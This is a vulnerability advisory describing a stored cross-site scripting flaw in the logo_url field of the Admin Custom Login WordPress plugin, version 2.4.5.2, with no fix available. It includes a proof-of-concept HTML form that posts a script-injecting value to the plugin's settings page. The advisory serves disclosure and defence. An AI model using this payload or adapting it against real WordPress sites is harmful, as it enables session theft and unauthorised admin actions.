Admin Custom Login WordPress plugin affected by persistent Cross-Site Scripting via Logo URL field

Abstract

A persistent Cross-Site Scripting vulnerability has been encountered in the Admin Custom Login WordPress plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. The logo_url field does not validate <script> tags and does not perform output encoding.

OVE ID

OVE-20160712-0002

Tested versions

This issue was succesfully tested on the Admin Custom Login WordPress plugin version 2.4.5.2.

Fix

There is currently no fix available.

Introduction

Admin custom login plugin give ability to customize your WordPress admin login page according to you.

Pugin allows to change background color, background image, background slide show, login form color, login form font size, login form position, add social media icon on form and many more features.

Details

As an admin, it's possible to upload a logo on the login page. The logo_url field does not validate <script> tags and does not perform output encoding.

Proof of concept

<html>
	<body>
		<form action="http://<target>/wp-admin/options-general.php?page=admin_custom_login" method="POST">
			<input type="hidden" name="Action" value="logoSave"/>
			<input type="hidden" name="logo_image" value="http://<target>/wp-content/uploads/2016/06/scriptalert1script.jpeg"/>
			<input type="hidden" name="logo_width" value="200"/>
			<input type="hidden" name="logo_height" value="60"/>
			<input type="hidden" name="logo_url" value="&quot;><script>alert(1)</script>"/>
			<input type="hidden" name="logo_url_title" value="\\\\"/>
			<input type="submit"/>
		</form>
	</body>
</html>

After this request is executed, re-open the admin panel of WordPress and visit the Admin Custom Login page.

Questions or feedback?